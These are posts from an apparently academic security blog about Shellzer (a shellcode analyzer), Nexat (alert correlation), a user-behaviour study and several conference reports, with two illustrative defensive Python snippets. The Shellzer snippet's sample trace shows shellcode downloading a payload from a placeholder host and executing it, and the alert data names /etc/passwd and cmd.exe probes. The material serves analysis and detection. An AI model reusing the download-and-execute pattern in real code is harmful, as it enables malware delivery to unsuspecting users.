Shellzer: a tool for the dynamic analysis of malicious shellcode

Last September, I presented Shellzer at the RAID 2011 conference. Shellzer is a tool I developed back in August 2010 to dynamically analyze malicious shellcode. The main goal was to analyze the shellcode samples that Wepawet has collected over the years. Due to the size of our dataset (about 30,000 shellcode samples at that time), an automated approach was clearly needed.

After trying several approaches and tools, I came across PyDbg, a Python Win32 debugging abstraction class. Using it, I started to write my own tool to dynamically analyze a given shellcode. My very first attempt consisted of single-stepping through the whole shellcode binary. This gave complete control over the sample's execution, which, the shellcode being a malicious piece of code, was an ideal feature. Unfortunately, this approach is not feasible in practice: the number of assembly instructions executed at run time is in the order of millions, even though shellcode is commonly only a few hundred bytes long. This is because many loops are present, some of which are executed thousands of times, and because the shellcode invokes Windows API functions. These two factors cause a huge overhead for an approach based on single-stepping, and the analysis consequently lasted several minutes on average.

My research has focused on finding a way to avoid single-stepping the whole shellcode execution while maintaining complete control over it. This has proved challenging, due to the many evasion techniques used by these pieces of code. If you are interested in the details, please read the paper. The output of the analysis currently consists of a detailed trace of the Windows API functions called (with their parameters and return values), the Windows DLLs that have been loaded, and the list of URLs contacted by the shellcode. Furthermore, Shellzer supports the analysis of shellcode samples extracted from malicious PDF documents, in addition to those detected in web-based drive-by-download attacks.

Since November 2011, this tool has been used by Wepawet. When a shellcode is detected, it is automatically forwarded to the shellcode analyzer and Shellzer's report is included in the main Wepawet report. Read this post for more details. Naturally, the tool is not perfect and some samples cannot be analyzed yet. If, after you submit a sample to Wepawet, a shellcode is detected but you don't see the additional shellcode information, it means that something went wrong. Please don't hesitate to contact us in case of errors: we need your feedback!
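To give an idea of what an analyst does with a report of this kind (API trace, loaded DLLs, contacted URLs), here is a small triage helper I am adding as an illustration. It is not Shellzer's code, and the one-call-per-line trace format it parses is constructed for the example; Shellzer's real report format is different. The API names are real Win32 functions, but which ones count as "loads a DLL" or "executes a file" is my own choice for the example.

```python
"""Triage of an API-call trace in the spirit of the Shellzer report.

Constructed example: the trace format ("Name(args) = return", one call per
line) and the sample trace are made up for illustration, not Shellzer output.
"""
import re

# Constructed sample trace; the URL and paths are placeholders.
TRACE = r"""
LoadLibraryA("urlmon.dll") = 0x7df20000
URLDownloadToFileA(0x0, "http://example.invalid/drop/payload.exe", "C:\Temp\upd.exe", 0x0, 0x0) = 0x0
LoadLibraryA("kernel32.dll") = 0x7c800000
WinExec("C:\Temp\upd.exe", 0x0) = 0x21
ExitProcess(0x0)
"""

# One call per line: API name, raw argument list, optional return value.
CALL_RE = re.compile(r"^(\w+)\((.*)\)(?:\s*=\s*(\S+))?\s*$")
# Argument tokens: a double-quoted string (backslash escapes allowed) or a bare token.
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|([^,\s]+)')
URL_RE = re.compile(r"https?://[^\s\"']+")

# Which APIs we treat as evidence of DLL loading / file execution (example choice).
DLL_LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
EXECUTORS = {"WinExec", "CreateProcessA", "CreateProcessW", "ShellExecuteA"}


def parse_trace(text):
    """Turn the trace text into a list of {"api", "args", "ret"} records."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue  # blank or malformed line: skip rather than guess
        name, raw_args, ret = m.groups()
        args = [quoted if quoted else bare for quoted, bare in ARG_RE.findall(raw_args)]
        calls.append({"api": name, "args": args, "ret": ret})
    return calls


def summarize(calls):
    """Extract the three things the post's report lists: API calls, DLLs, URLs
    (plus which files the shellcode tried to execute)."""
    summary = {"api_calls": [c["api"] for c in calls], "dlls": [], "urls": [], "executed": []}
    for c in calls:
        if c["api"] in DLL_LOADERS and c["args"]:
            summary["dlls"].append(c["args"][0])
        if c["api"] in EXECUTORS and c["args"]:
            summary["executed"].append(c["args"][0])
        for arg in c["args"]:
            summary["urls"].extend(URL_RE.findall(arg))
    return summary


if __name__ == "__main__":
    for key, value in summarize(parse_trace(TRACE)).items():
        print(f"{key}: {value}")
```

The parser deliberately skips lines it cannot match instead of raising, so a partially truncated report still yields a usable summary; in a real pipeline you would want to count those skipped lines as a signal that the analysis was incomplete.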

Posted in Binary Analysis, Web Security

Report from SecurityZone 2011 – The 1st International Security Conference in Colombia (Cali)

Last month I was invited to SecurityZone in Cali for the 1st International Security Conference of Colombia. Edgar Rojas, CEO of The MuRo Group, brought together 16 well-known and strong international security experts for 2+1 days of conference in DEFCON/BlackHat style. Among them, strong personalities such as Ian Amit, Chris John Riley, Stefan Friedli and Chris Nickerson animated the event with talks on cyberwar attacks, compliance, red team testing and threat modeling.

The numbers alone document the success of this first security event in Colombia: the conference hosted more than 450 attendees from all over Colombia, the UK, the USA, Venezuela, Brazil, Argentina and Mexico, and over 2400 people were connected via streaming.

But SecurityZone's success is not only a matter of numbers: among the many conferences I have attended recently, SecurityZone has certainly been one of the best for its people. The organizers did an excellent job in putting together this event. I won't forget their cordiality, kindness, and friendly, always smiling attitude. At the same time, the attendees were hungry for knowledge, always asking for information and photos :-)

I am now looking forward to SecurityZone 2012, and in the meantime follow us on Twitter!

Posted in Conferences

About the Nexat paper at ACSAC 2011

Last week, our group attended ACSAC 2011. The conference was held at the Buena Vista Palace in Orlando, Florida. I presented the Nexat paper, and the feedback was encouraging.

Nexat was a research project in collaboration with Casey Cipriano and Amir Houmansadr. Nexat tries to solve a problem that a typical security administrator faces nowadays. Security administrators are normally overwhelmed by the amount of security alerts their monitoring tools generate. They also cannot keep up with the stream of events and predict the next security-related events. Therefore, administrators are usually reactive.

The reason for this problem is that the security battlefield is not even: a single button hit by an attacker may cause thousands of alerts to be generated on the administrator's side. Nexat tries to even the field by deducing relationships between different sets of alerts. Nexat is able to detect related alerts (alerts that may be part of the same attack) and uses them to predict the next step of the attack. This way, Nexat lets administrators be one step ahead of the attackers. Nexat does not require a priori knowledge about attacks, which makes it able to detect and predict new types of attacks as long as they are composed of detectable steps. We used the alerts generated by Snort during iCTF 2008.
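As an added illustration of the idea (related alerts are grouped, relationships between alert types are learned from the data alone, and the learned relationships predict the next step), here is a deliberately simple version: alerts are grouped into sessions by host pair and time gap, and a first-order transition model between Snort signature messages is learned from those sessions. This is my own toy code, not Nexat's algorithm; the alert records are constructed, not iCTF 2008 data, and the 60-second session gap is an arbitrary choice.

```python
"""Toy alert correlation and next-step prediction, in the spirit of Nexat.

Example code, not Nexat's implementation. Alerts below are constructed
Snort-style records: (timestamp in seconds, signature message, src host, dst host).
"""
from collections import Counter, defaultdict

ALERTS = [
    (0,   "SCAN nmap",                  "10.0.0.5", "10.0.1.2"),
    (3,   "WEB-MISC /etc/passwd",       "10.0.0.5", "10.0.1.2"),
    (9,   "SHELLCODE x86 NOOP",         "10.0.0.5", "10.0.1.2"),
    (12,  "ATTACK-RESPONSES id check",  "10.0.1.2", "10.0.0.5"),  # reply direction
    (100, "SCAN nmap",                  "10.0.0.7", "10.0.1.3"),
    (104, "WEB-MISC /etc/passwd",       "10.0.0.7", "10.0.1.3"),
    (110, "SHELLCODE x86 NOOP",         "10.0.0.7", "10.0.1.3"),
    (115, "ATTACK-RESPONSES id check",  "10.0.1.3", "10.0.0.7"),
    (200, "SCAN nmap",                  "10.0.0.9", "10.0.1.4"),
    (206, "WEB-MISC /etc/passwd",       "10.0.0.9", "10.0.1.4"),
    (300, "SCAN nmap",                  "10.0.0.8", "10.0.1.6"),
    (305, "WEB-IIS cmd.exe access",     "10.0.0.8", "10.0.1.6"),
    (400, "SCAN nmap",                  "10.0.0.9", "10.0.1.5"),
]


def group_sessions(alerts, gap=60):
    """Group alerts into candidate attack sessions: same (unordered) host pair,
    ordered by time, and split whenever two consecutive alerts are more than
    `gap` seconds apart. Returns a list of signature sequences."""
    by_pair = defaultdict(list)
    for ts, sig, src, dst in sorted(alerts):
        by_pair[frozenset((src, dst))].append((ts, sig))
    sessions = []
    for events in by_pair.values():
        current = []
        for ts, sig in events:
            if current and ts - current[-1][0] > gap:
                sessions.append([s for _, s in current])
                current = []
            current.append((ts, sig))
        sessions.append([s for _, s in current])
    return sessions


def learn_transitions(sessions):
    """Count how often one signature is followed by another within a session.
    No prior knowledge of attacks is used; the model comes from the alerts only."""
    model = defaultdict(Counter)
    for seq in sessions:
        for cur, nxt in zip(seq, seq[1:]):
            model[cur][nxt] += 1
    return model


def predict_next(model, last_sig):
    """Most likely next signature after `last_sig`, with its empirical probability,
    or None when this signature has never been observed to be followed by another."""
    successors = model.get(last_sig)
    if not successors:
        return None
    sig, count = successors.most_common(1)[0]
    return sig, count / sum(successors.values())


if __name__ == "__main__":
    model = learn_transitions(group_sessions(ALERTS))
    for sig in ("SCAN nmap", "WEB-MISC /etc/passwd", "ATTACK-RESPONSES id check"):
        print(f"after {sig!r}: {predict_next(model, sig)}")
```

Grouping by the unordered host pair is what lets the victim's reply ("ATTACK-RESPONSES id check") land in the same session as the attacker's steps; a real system would also need to handle attackers that rotate source hosts, which a per-pair key cannot see.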

Posted in Systems Security

Insights into User Behavior in Dealing with Internet Attacks

At last, we finished analyzing the data from the user experiments we conducted earlier this year, and collected the results in the paper "Insights into User Behavior in Dealing with Internet Attacks", which is going to appear at NDSS in February 2012.

Many Internet attacks have a strong human aspect: they require some sort of user interaction, such as clicking on a malicious link. In order to understand how users cope with these attacks, and how they judge the security implications of the actions they take, we built an online security test platform and conducted experiments with over 160 Internet users with diverse backgrounds and technical sophistication. We presented the participants with concrete security scenarios exemplifying prevalent attacks such as XSS, link manipulation tricks and file sharing scams, and observed their decisions.

To very briefly summarize some of our interesting findings:

  • Non-technical users largely failed to recognize threats and to assess the consequences of their actions. Interestingly, they were still able to avert relatively simple attacks solely based on their intuition and on frequent exposure to similar situations in the past.
  • Many users treated the ‘length’ of URLs as a sign of maliciousness. They avoided long and complicated URLs claiming those look suspicious, but followed shorter (but malicious!) links. Analogously, users often made misinformed decisions based on the ‘size’ of files.
  • Non-technical users were mostly unaware of how shortened URLs (e.g., TinyURL) work; none of them reported knowing how to check the real link destinations.
  • Trick banners commonly found in file sharing sites had a high success rate of tricking the participants, even those who were tech-savvy.

I would encourage you to read the paper if you are interested in the details of the tests and our analysis and discussion of the results. I would also like to thank everyone who participated in our tests!

Posted in Web Security

Report from RAID 2011

A few weeks ago we attended the 14th Recent Advances in Intrusion Detection (RAID) Symposium in Menlo Park, California. The conference was held at SRI International and featured 20 talks about malware, application security, anomaly detection and network security.

Our group presented three papers: Yanick talked about Shellzer, a tool for the dynamic analysis of malicious shellcode, which will soon be integrated with Wepawet. Bob presented Dymo, a system that provides a dynamic code identity primitive that tracks the run-time integrity of a process and can also produce labels for network packets to distinguish between legitimate and malicious network activity.

I talked about Disarm, which I developed together with Paolo and Clemens for my Master's degree at the Vienna University of Technology. Operating the dynamic malware analysis sandbox Anubis, we are very interested in detecting environment-sensitive malware that is capable of fingerprinting Anubis and evading the analysis. Disarm therefore automates the screening of malware samples for evasive behavior, and it helped us discover several evasion techniques used by malware against Anubis (and also against other dynamic analysis sandboxes).

I was pleased with the positive feedback and interest in our work and thoroughly enjoyed the conference, especially meeting colleagues from UCSB and the Institute Eurécom and other experts from the security community.

Posted in Conferences

Report from the USENIX Security Symposium 2011

Last week we attended the 20th USENIX Security Symposium in San Francisco. Taking advantage of the high availability of travel grants and of the fact that the conference was close to Santa Barbara, we packed a minivan with people and drove up north.

As a group, we presented two papers at the conference. I gave my talk on BotMagnifier, about which I have already blogged in the past. The paper was well received by the audience, and I was asked many questions, some of which will help improve the system in future work. The other paper our group presented was JACKSTRAWS: Picking Command and Control Connections from Bot Traffic. Gregoire presented this paper, which is a collaboration between UCSB and our colleagues at Ruhr University Bochum. In it they present Jackstraws, a system that is able to identify C&C connections and, using machine learning techniques, builds models of such connections, with the goal of matching the behavior of unknown bots against the generated models.

The level of the conference was really good, and we attended several interesting talks. Manos Antonakakis presented a system for detecting domains used by malware by looking at the upper DNS hierarchy. This approach is very similar to the EXPOSURE system developed by our group, but operates at a higher level. Another interesting talk was given by Chris Grier: they infiltrated 4 large pay-per-install services and studied the dynamics of and the market behind malware droppers. I also enjoyed the talk by Edward Schwartz, who presented Q, a system that automatically builds ROP payloads for vulnerable binaries. However, a problem with this paper is that while it does a good job of showing how existing defenses can be bypassed using ROP, it is not as successful in discussing the efforts made by the research community to fight such attacks. For example, the paper "G-Free: Defeating Return-Oriented Programming through Gadget-less Binaries", which our group published last year and which provides a defense against ROP, is not even mentioned in their related work discussion.

Posted in Conferences

Report from Amsterdam (OWASP & DIMVA)

Last week I was in Amsterdam for an intensive three days of conferences, talks and social events. On the first evening, I was kindly invited to join the OWASP Netherlands Chapter Meeting to present the work we recently did together with the KULeuven guys on the (in)security of File Hosting Services. In this research we explain why hosting providers do not put enough effort into providing security-aware services. If you are interested in this topic, you can take a look at The Register's report.

On the second day, I attended DIMVA 2011, a popular European security conference, where I could meet many well-known people. This year, the conference was hosted by Herbert Bos of VU University, who did his best to bring security experts together in a friendly and relaxed atmosphere. The social event was organized on a 40-meter sailing boat, where we had our dinner. DIMVA also featured a Capture the Flag (dCTF), in which 40 teams from universities and the underground participated. Our team from EURECOM played well and finished 7th: a good result considering that more than half of the team was composed of students.

My talk at DIMVA (slides) was about a new attack against social network users that we call Reverse Social Engineering. Basically, the idea is to feed victims a pretext to get back to the attacker, instead of the attacker contacting the victims. By running these experiments on three different vulnerable providers, we showed that a single honeypot profile can easily attract thousands of unsuspecting users. Compared to its "little brother", the reverse flavor of social engineering can potentially reach millions of victims easily, and can bypass current behavioral and filter-based detection.


Posted in Web Security